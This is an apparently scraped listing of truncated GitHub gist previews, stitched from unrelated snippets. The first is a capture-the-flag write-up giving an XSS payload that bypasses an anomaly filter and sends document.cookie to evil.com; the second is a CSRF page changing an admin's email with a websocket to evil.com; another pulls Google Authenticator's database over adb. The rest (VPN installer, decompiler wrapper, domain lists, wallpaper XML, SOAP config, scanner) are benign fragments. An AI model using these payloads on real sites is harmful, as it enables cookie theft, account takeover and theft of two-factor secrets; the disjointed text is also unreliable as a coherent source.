This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
In this task we had to bypass a badly-trained anomaly detection algorithm and perform an XSS attack. | |
We didn't have to figure out exactly how the anomaly detection worked, but as soon as we understood that the anomaly scoring was based on the density of the "bad" (i.e. non-alphanumeric) chars in the payload. Thus, the solution was to dissolve the attack payload in a lot of benign symbols ([AxN] represents a string of N A's): | |
anomaly.php?name=[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]+onerror=src%2b=document.cookie+[Ax1000]+/> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<body> | |
<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST"> | |
// change admin's email | |
<input type="text" name="email" value="wololo@coolmail.com"> | |
<input type="text" name="csrf" value=""> | |
<input type="text" name="change" value="Modify profile"> | |
</form> | |
<iframe id="leakchar"></iframe> | |
<script> | |
const WS = "ws://evil.com:8000"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Very secure OpenVPN server installer for CentOS | |
if [[ "$EUID" -ne 0 ]]; then | |
echo "Sorry, you need to run this as root" | |
exit 1 | |
fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
############################################################################ | |
# | |
# IntelliJ IDEA Java Decompiler wrapper script for Windows | |
# | |
# @see https://stackoverflow.com/questions/28389006/how-to-decompile-to-java-files-intellij-idea/30106981 | |
# @see https://github.com/JetBrains/intellij-community/tree/master/plugins/java-decompiler/engine | |
# | |
############################################################################ | |
$IDEA_PATH = "$Env:ProgramFiles\JetBrains\IntelliJ IDEA 2020.1.1" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
aa.je | |
ae.je | |
ae.gg | |
ae.ht | |
af.je | |
af.cx | |
af.gg | |
af.gl | |
af.ht | |
ah.je |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
aj.rs | |
aw.rs | |
ay.rs | |
bd.rs | |
bf.rs | |
bh.rs | |
bj.rs | |
bq.rs | |
bx.rs | |
cj.rs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- Instructions: | |
- Download and unzip Mojave dynamic background here: https://files.rb.gd/mojave_dynamic.zip | |
- Rename the extracted folder as "mojave-background" (Excuse the trouble but I renamed it on my machine and already use that path in the XML file) | |
- Save this xml file next to the Mojave background files | |
- Fix the path to the background images below (better using absolute path) | |
- Lastly, either: | |
+ GNOME: Use gnome-tweaks tool to select this XML as wallpaper (as default wallpaper settings won't let you choose wallpaper from custom path) | |
+ MATE: Go to background setting (in Appearance) > Choose +Add... > make sure **All files** filter is selected at the bottom right > Then choose mojave.xml | |
--> | |
<background> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ini_set('soap.wsdl_cache_enabled', 0); | |
ini_set('soap.wsdl_cache_ttl', 900); | |
ini_set('default_socket_timeout', 15); | |
$params = array('param1'=>$param1); | |
$wsdl = 'http://service_url/method?WSDL'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Usage : ./scanio.sh <save file> | |
# Example: ./scanio.sh cname_list.txt | |
# Premium | |
function ech() { | |
spinner=( "|" "/" "-" "\\" ) | |
while true; do | |
for i in ${spinner[@]}; do | |
echo -ne "\r[$i] $1" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Last tested February 7 2014 on a Galaxy S3 (d2att) running Cyanogenmod 11 nightly, with Google Authenticator 2.49. | |
### Device with Google Authenticator must have root. | |
### Computer requires Android Developer Tools and SQLite 3. | |
### Connect your device in USB debugging mode. | |
$ cd /tmp | |
$ adb root | |
$ adb pull /data/data/com.google.android.apps.authenticator2/databases/databases |
OlderNewer